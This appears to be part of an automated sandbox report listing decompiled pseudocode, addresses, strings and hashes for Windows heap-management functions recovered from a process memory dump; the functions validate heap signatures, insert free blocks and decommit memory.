0x00e14046
0x00e14044
0x00e14049
0x00e68327
0x00e68334
0x00e68339
0x00e6833c
0x00e1404f
0x00e1404f
0x00e1404f
0x00e14051
0x00e14056
0x00e14063
0x00e14063
0x00e14068
0x00000000
0x00e14068
0x00e13fdf
0x00e13fe2
0x00e13fe4
0x00e13fe7
0x00e13fef
0x00e14003
0x00e14005
0x00e14005
0x00e1400c
0x00e14013
0x00e14016
0x00e14017
0x00e1401b
0x00e1401e
0x00000000
0x00e1401e
0x00e13fb6
0x00e13eb1
0x00e13eb4
0x00e13eb7
0x00e13ebc
0x00e682a9
0x00e682ab
0x00e13ec2
0x00e13ed3
0x00e13ed5
0x00e13ed8
0x00e13ed8
0x00e13edd
0x00e682b3
0x00e682b6
0x00000000
0x00e13ee3
0x00e13ee8
0x00e13eed
0x00e13ef0
0x00e13ef3
0x00e13f02
0x00e13f05
0x00e13f08
0x00e682c0
0x00e682c3
0x00e682c5
0x00e682c8
0x00e682d0
0x00e682e4
0x00e682e6
0x00e682e6
0x00e682ed
0x00e682f4
0x00e682f7
0x00e682f8
0x00e682fc
0x00e682ff
0x00e682ff
0x00e13f0e
0x00e13f11
0x00e13f16
0x00e13f1d
0x00e13f31
0x00e68307
0x00e68307
0x00e13f31
0x00e13f39
0x00e13f48
0x00e13f4d
0x00e13f50
0x00e13f50
0x00e13f53
0x00e13f58
0x00e13f65
0x00e13f65
0x00e13f6a
0x00000000
0x00e13f6a
0x00e13edd
0x00e13dda
0x00e13ddd
0x00e13de0
0x00e13de5
0x00e68245
0x00e13deb
0x00e13df7
0x00e13dfc
0x00e13dfe
0x00e13e01
0x00e13e01
0x00e13e06
0x00e6824d
0x00e6824f
0x00e68254
0x00000000
0x00e13e0c
0x00e13e11
0x00e13e16
0x00e13e19
0x00e13e29
0x00e13e2c
0x00e13e2f
0x00e6825c
0x00e6825f
0x00e68261
0x00e68264
0x00e6826c
0x00e68280
0x00e68282
0x00e68282
0x00e68289
0x00e68290
0x00e68293
0x00e68294
0x00e68298
0x00e6829b
0x00e6829b
0x00e13e35
0x00e13e38
0x00e13e3d
0x00e13e44
0x00e13e58
0x00e682a3
0x00e682a3
0x00e13e58
0x00e13e60
0x00e13e6f
0x00e13e74
0x00e13e77
0x00e13e77
0x00e13e7a
0x00e13e7f
0x00e13e8c
0x00e13e8c
0x00e13e91
0x00000000
0x00e13e91

Strings

Kernel-MUI-Language-Allowed, xrefs: 00E13DC0
Kernel-MUI-Language-Disallowed, xrefs: 00E13E97
Kernel-MUI-Number-Allowed, xrefs: 00E13D8C
Kernel-MUI-Language-SKU, xrefs: 00E13F70
WindowsExcludedProcs, xrefs: 00E13D6F

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 79afe05d8b8d17a9c57f8f38ad30bdb5e7bb8147e070931dd771ad4b09cdc30f
Instruction ID: 0806a989257148f61f6e5de9e4a30e3a2b419282ea63bf7d8378fe43e0fb2f67
Opcode Fuzzy Hash: 79afe05d8b8d17a9c57f8f38ad30bdb5e7bb8147e070931dd771ad4b09cdc30f
Instruction Fuzzy Hash: 85F12AB2D40618EBCB11DFA9D980AEEBBF9FF08750F15116AE905B7251D7309E41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E040E1, Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E00E040E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E00E0B150();
					} else {
						E00E0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00E0B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E00E0B150(", passed to %s", _t29);
					}
					_push("\n");
					E00E0B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0xef6378 = 1;
						asm("int3");
						 *0xef6378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x00e040e6
0x00e040e8
0x00e040f1
0x00e6042d
0x00e6044c
0x00e60451
0x00e6042f
0x00e60444
0x00e60449
0x00e6045d
0x00e60466
0x00e6046e
0x00e60474
0x00e60475
0x00e6047a
0x00e6048a
0x00e6048c
0x00e60493
0x00e60494
0x00e60494
0x00000000
0x00e6049b
0x00000000

Strings

HEAP[%wZ]: , xrefs: 00E6043F
Invalid heap signature for heap at %p, xrefs: 00E60458
RtlAllocateHeap, xrefs: 00E60468
, passed to %s, xrefs: 00E60469
HEAP: , xrefs: 00E6044C

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: 80ecee5d17b37a50f92f08c0bd2946fa01101998cc376b8dd05fa3e2eb03e09d
Instruction ID: 0acaa4f4c02735424907c23f91fc7b210fd52ea90b9a8ae4db76c0a1decb0548
Opcode Fuzzy Hash: 80ecee5d17b37a50f92f08c0bd2946fa01101998cc376b8dd05fa3e2eb03e09d
Instruction Fuzzy Hash: CD012832146290DED225A765E41EF9377E4EB40BB0F285029F1087B6C28FA49884C121

Uniqueness

Uniqueness Score: -1.00%

Function 00E2A830, Relevance: 5.4, Strings: 4, Instructions: 350
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E00E2A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0xef8748 - 1;
					if( *0xef8748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E00E0B150();
									_t260 = _t257 + 4;
								} else {
									E00E0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E00E0B150();
								_t257 = _t260 + 4;
								__eflags =  *0xef7bc8;
								if(__eflags == 0) {
									E00EC2073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E00ECA80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E00E5D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E00E2AB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E00ECA80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E00ECA80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0xef8748 - 1;
					if( *0xef8748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E00E0B150();
							} else {
								E00E0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E00E0B150();
							__eflags =  *0xef7bc8;
							if(__eflags == 0) {
								_t131 = E00EC2073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}

0x00e2a83a
0x00e2a83c
0x00e2a83e
0x00e2a841
0x00e2a844
0x00e2a84a
0x00e2aa53
0x00e2aa59
0x00e2aa59
0x00e2a858
0x00e2a85e
0x00e2aaf5
0x00e2aafc
0x00e7229e
0x00e722a2
0x00e722a8
0x00e722b3
0x00e722b5
0x00e722bb
0x00e722c1
0x00e722c5
0x00e722e6
0x00e722eb
0x00e722f0
0x00e722c7
0x00e722dc
0x00e722e1
0x00e722e1
0x00e722f3
0x00e722f8
0x00e722fd
0x00e72300
0x00e72307
0x00e7230e
0x00e7230e
0x00e72313
0x00e72313
0x00e722b5
0x00e722a2
0x00e2aafc
0x00e2a864
0x00e2a869
0x00e2aa5c
0x00e2aa5e
0x00e2a86f
0x00e2a87f
0x00e2a885
0x00e2a885
0x00e2a88b
0x00e2a890
0x00e2a896
0x00e2ab0c
0x00e2ab0f
0x00e2ab15
0x00e72320
0x00e72320
0x00e2ab1b
0x00e2a89c
0x00e2a89f
0x00e2a8a2
0x00e2a8a2
0x00e2a8a5
0x00e2a8af
0x00e2a8b3
0x00e2a8b8
0x00e2aa66
0x00e2a8be
0x00e2a8c5
0x00e2a8c6
0x00e2a8ce
0x00e72328
0x00e72332
0x00e72337
0x00e72337
0x00e2a8ce
0x00e2a8d4
0x00e2a8d8
0x00e2a8db
0x00e2a8de
0x00e2a8e1
0x00e2a8e5
0x00e2a8e8
0x00e2a8f0
0x00e2a8f3
0x00e7234c
0x00e72350
0x00e72355
0x00e72359
0x00e72359
0x00e2a8f9
0x00e2a901
0x00e2aae4
0x00e2aae4
0x00e2aaea
0x00000000
0x00e2a907
0x00e2a90a
0x00e2a91d
0x00e2a91d
0x00000000
0x00e2a910
0x00e2a910
0x00e2a910
0x00e2a914
0x00e2a924
0x00e2a924
0x00e2a924
0x00e2a924
0x00e2a916
0x00e2a91b
0x00000000
0x00000000
0x00000000
0x00e2a91b
0x00e2a925
0x00e2a925
0x00e2a932
0x00e2a936
0x00e2a93c
0x00e2a93c
0x00e2a93c
0x00e2ab22
0x00e2ab24
0x00e2ab27
0x00e2ab27
0x00e2a942
0x00e2a944
0x00e2aaba
0x00e2aabd
0x00e2aac0
0x00e2aac0
0x00e2aac2
0x00e2ab2f
0x00e2aac4
0x00e2aac4
0x00e2aac7
0x00e2aaca
0x00e2aacc
0x00e2aace
0x00e2aace
0x00e2aace
0x00e2aad1
0x00e2aad1
0x00e2aad7
0x00e2aad9
0x00000000
0x00000000
0x00e72361
0x00e72369
0x00e7236b
0x00000000
0x00e72371
0x00000000
0x00e72371
0x00000000
0x00e7236b
0x00e2aac0
0x00e2a94a
0x00e2a94a
0x00e2a94d
0x00e2a94d
0x00e2a950
0x00e2a954
0x00e72376
0x00e72380
0x00e2a95a
0x00e2a95a
0x00e2a95c
0x00e2a95f
0x00e2a961
0x00e2a961
0x00e2a967
0x00e2a96a
0x00e2a972
0x00e2aa02
0x00e2aa06
0x00e2aa10
0x00e2aa16
0x00e2aa16
0x00e2aa1b
0x00e2aa21
0x00e2aa24
0x00e2aa27
0x00e2aa29
0x00e2aa2c
0x00e2aa32
0x00000000
0x00000000
0x00000000
0x00000000
0x00e2a978
0x00e2a978
0x00e2a97b
0x00e2a981
0x00e2a996
0x00e2a998
0x00e2a99f
0x00e2a9a2
0x00e7238a
0x00e2a9a8
0x00e2a9a8
0x00e2a9a8
0x00e2a9aa
0x00e2a9ad
0x00e2a9b0
0x00e2a9bb
0x00e2a9be
0x00e2a9c7
0x00e2a9c9
0x00e2a9c9
0x00e2a9cc
0x00e2a9d1
0x00e2aa6d
0x00e2aa70
0x00e2aa73
0x00e2aa75
0x00e2aa79
0x00e2aa7e
0x00e2aa82
0x00e2aa8f
0x00e2aa94
0x00e2aa96
0x00e72392
0x00e723a1
0x00e723a1
0x00e2aa9c
0x00e2aa9f
0x00e2aaa2
0x00e2aaa2
0x00e2aaa8
0x00e2aaab
0x00e2aaaf
0x00000000
0x00e2aab5
0x00000000
0x00e2aab5
0x00e2a9d7
0x00e2a9d7
0x00e2a9da
0x00e2a9e0
0x00e2a9e3
0x00e2a9e6
0x00e2a9e9
0x00e2a9eb
0x00e2a9fd
0x00e2a9fd
0x00000000
0x00e2a9eb
0x00000000
0x00000000
0x00000000
0x00e2a983
0x00e2a983
0x00e2a983
0x00e2a987
0x00e2a995
0x00e2a995
0x00e2a995
0x00e2a995
0x00e2a989
0x00e2a98e
0x00000000
0x00e2a990
0x00000000
0x00e2a990
0x00e2a98e
0x00000000
0x00e2a983
0x00e2a972
0x00e2a90a
0x00e2aa34
0x00e2aa34
0x00e2aa40
0x00e2aa43
0x00e2aa46
0x00e2aa4d
0x00e723ab
0x00e723b2
0x00e723b8
0x00e723be
0x00e723c3
0x00e723c5
0x00e723cb
0x00e723d1
0x00e723d5
0x00e723f6
0x00e723fb
0x00e723d7
0x00e723ec
0x00e723f1
0x00e72403
0x00e72408
0x00e72410
0x00e72417
0x00e72422
0x00e72422
0x00e72417
0x00e723c5
0x00e723b2
0x00000000

Strings

ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 00E72403
HEAP[%wZ]: , xrefs: 00E722D7, 00E723E7
((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 00E722F3
HEAP: , xrefs: 00E722E6, 00E723F6

Memory Dump Source

Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: ec11e0ca889c839cfb428bfe02e7b1675e33b4f5438881306d78a20ad73bdbfd
Instruction ID: 92b9543052a8d5ccd3ed9488a79923e51a71a8fbfeabb631db0e11f5a9586e2c
Opcode Fuzzy Hash: ec11e0ca889c839cfb428bfe02e7b1675e33b4f5438881306d78a20ad73bdbfd
Instruction Fuzzy Hash: E3D1D070A002559FDB18CF69D590BBAB7F1FF88304F18A17DD85AAB341E334A885CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00E2A229, Relevance: 5.2, Strings: 4, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00E2A229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E00E2DF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E00E49730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E00ECA80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E00E49660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E00E0B150();
					} else {
						E00E0B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E00E0B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E00E27D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E00EC138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E00E27D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E00E27D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E00EC1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E00E27D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E00E27D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E00EC1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E00E5D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}

0x00e2a229
0x00e2a231
0x00e2a23f
0x00e2a242
0x00e2a244
0x00e2a24c
0x00e2a255
0x00e2a25a
0x00e2a25f
0x00e71c76
0x00e71c78
0x00e71c7e
0x00e71c7f
0x00e71c81
0x00e71c82
0x00e71c84
0x00e71c89
0x00e71c8b
0x00e71c9e
0x00e71c9e
0x00e71cab
0x00e71cb2
0x00000000
0x00e71cb2
0x00e71c8d
0x00e71c92
0x00000000
0x00000000
0x00e71c94
0x00e71c98
0x00000000
0x00000000
0x00000000
0x00e71c98
0x00e2a265
0x00e2a265
0x00e2a266
0x00e2a26f
0x00e2a270
0x00e2a276
0x00e2a277
0x00e2a279
0x00e2a27e
0x00e2a282
0x00e71db5
0x00e71dbb
0x00e71dc1
0x00e71dc5
0x00e71de4
0x00e71de9
0x00e71dc7
0x00e71ddc
0x00e71de1
0x00e71def
0x00e71df3
0x00e71df7
0x00e71dfe
0x00e71e06
0x00e2a302
0x00e2a308
0x00e2a308
0x00e2a288
0x00e2a28d
0x00e2a294
0x00e71cc1
0x00e2a29a
0x00e2a29a
0x00e2a29a
0x00e2a29f
0x00e71ccb
0x00e71cd1
0x00e71cd8
0x00e71cea
0x00e71cea
0x00e71cd8
0x00e2a2a9
0x00e2a2af
0x00e2a2bc
0x00e71cfd
0x00e2a2c2
0x00e2a2c2
0x00e2a2c2
0x00e2a2c7
0x00e71d07
0x00e71d0d
0x00e71d14
0x00e71d1f
0x00e71d21
0x00e71d2c
0x00e71d2c
0x00e71d2c
0x00e71d47
0x00e71d47
0x00e71d14
0x00e2a2cd
0x00e2a2d2
0x00e2a2d9
0x00e71d5a
0x00e2a2df
0x00e2a2df
0x00e2a2df
0x00e2a2e4
0x00e71d69
0x00e71d6b
0x00e71d76
0x00e71d76
0x00e71d76
0x00e71d91
0x00e71d91
0x00e2a2ea
0x00e2a2f0
0x00e2a2f5
0x00e71da8
0x00e71dad
0x00e71dad
0x00e2a2fd
0x00e2a300
0x00000000

Strings

ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 00E71DF9
HEAP[%wZ]: , xrefs: 00E71DD7
`, xrefs: 00E71C8D
